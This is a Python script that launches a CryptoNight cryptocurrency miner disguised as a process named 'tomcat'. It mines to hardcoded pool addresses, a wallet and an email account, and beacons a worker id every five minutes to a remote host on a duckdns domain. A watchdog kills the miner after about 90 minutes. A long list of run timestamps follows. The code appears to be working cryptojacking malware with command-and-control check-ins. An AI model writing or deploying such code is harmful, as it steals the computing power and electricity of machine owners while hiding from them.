import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:22:06.417280
#2018-02-17 16:09:01.938043
#2018-02-17 17:56:03.598501
#2018-02-17 19:43:07.014394
#2018-02-17 21:30:09.159773
#2018-02-17 23:16:05.494519
#2018-02-18 01:03:03.415885
#2018-02-18 02:51:05.017759
#2018-02-18 04:41:07.063068
#2018-02-18 06:33:06.360942
#2018-02-18 08:21:04.070471
#2018-02-18 10:09:06.369412
#2018-02-18 11:55:07.738163
#2018-02-18 13:40:04.184895
#2018-02-18 15:31:06.315548
#2018-02-18 17:19:05.788210
#2018-02-18 19:08:01.899576
#2018-02-18 20:54:01.709184
#2018-02-18 22:39:03.965862
#2018-02-19 00:28:07.599376
#2018-02-19 02:13:07.672596
#2018-02-19 04:03:01.327847
#2018-02-19 05:46:07.792533
#2018-02-19 07:34:05.345971
#2018-02-19 09:25:01.504152
#2018-02-19 11:14:06.740708
#2018-02-19 13:03:07.839977
#2018-02-19 14:49:07.393907
#2018-02-19 16:38:06.499473
#2018-02-19 18:24:08.767991
#2018-02-19 20:09:04.682880
#2018-02-19 21:58:04.872182
#2018-02-19 23:42:08.452436
#2018-02-20 01:28:07.848163
#2018-02-20 03:17:05.834123
#2018-02-20 05:04:05.330173
#2018-02-20 06:46:08.410600
#2018-02-20 08:33:05.731119
#2018-02-20 10:17:04.655120
#2018-02-20 12:02:06.449761
#2018-02-20 13:48:04.717162
#2018-02-20 15:27:01.694802
#2018-02-20 17:12:05.180170
#2018-02-20 19:01:09.647440
#2018-02-20 20:50:07.270998
#2018-02-20 22:34:01.693848
#2018-02-21 00:14:05.526845
#2018-02-21 02:01:01.636207
#2018-02-21 03:48:01.409060
#2018-02-21 05:31:02.030397
#2018-02-21 07:19:07.772823
#2018-02-21 09:04:01.988941
#2018-02-21 10:52:02.192191
#2018-02-21 12:38:07.344493
#2018-02-21 14:27:07.964886
#2018-02-21 16:14:08.027130
#2018-02-21 18:05:07.827731
#2018-02-21 19:53:06.367014
#2018-02-21 21:40:09.056996
#2018-02-21 23:27:01.628562
#2018-02-22 01:15:08.164362
#2018-02-22 03:06:01.844410
#2018-02-22 04:50:06.998057
#2018-02-22 06:35:03.132736
#2018-02-22 08:23:04.748197
#2018-02-22 10:11:10.191746
#2018-02-22 11:57:09.115805
#2018-02-22 13:44:08.241084
#2018-02-22 15:34:04.314237
#2018-02-22 17:20:09.096802
#2018-02-22 19:07:02.146858
#2018-02-22 20:59:01.943739
#2018-02-22 22:45:01.772102
#2018-02-23 00:32:02.173975
#2018-02-23 02:18:05.878542
#2018-02-23 04:07:02.026292
#2018-02-23 05:55:07.791115
#2018-02-23 07:35:03.140110
#2018-02-23 09:37:08.077762
#2018-02-23 11:43:07.259960
#2018-02-23 13:33:01.716215
#2018-02-23 15:18:08.629450
#2018-02-23 17:06:01.250825
#2018-02-23 18:54:06.977105
#2018-02-23 20:40:07.745869
#2018-02-23 22:28:03.393939
#2018-02-24 00:14:07.233505
#2018-02-24 02:06:01.701676
#2018-02-24 03:38:03.900200
#2018-02-24 05:10:09.800654
#2018-02-24 06:47:04.208467
#2018-02-24 08:20:07.234672
#2018-02-24 09:49:03.963544
#2018-02-24 11:32:05.259026
#2018-02-24 12:59:01.230900
#2018-02-24 14:33:04.359061
#2018-02-24 16:03:06.581927
#2018-02-24 17:37:01.638762
#2018-02-24 19:12:01.585794
#2018-02-24 20:45:04.040633
#2018-02-24 22:30:09.656251
#2018-02-25 01:02:06.512774
#2018-02-25 02:58:05.826299
#2018-02-25 07:07:05.095545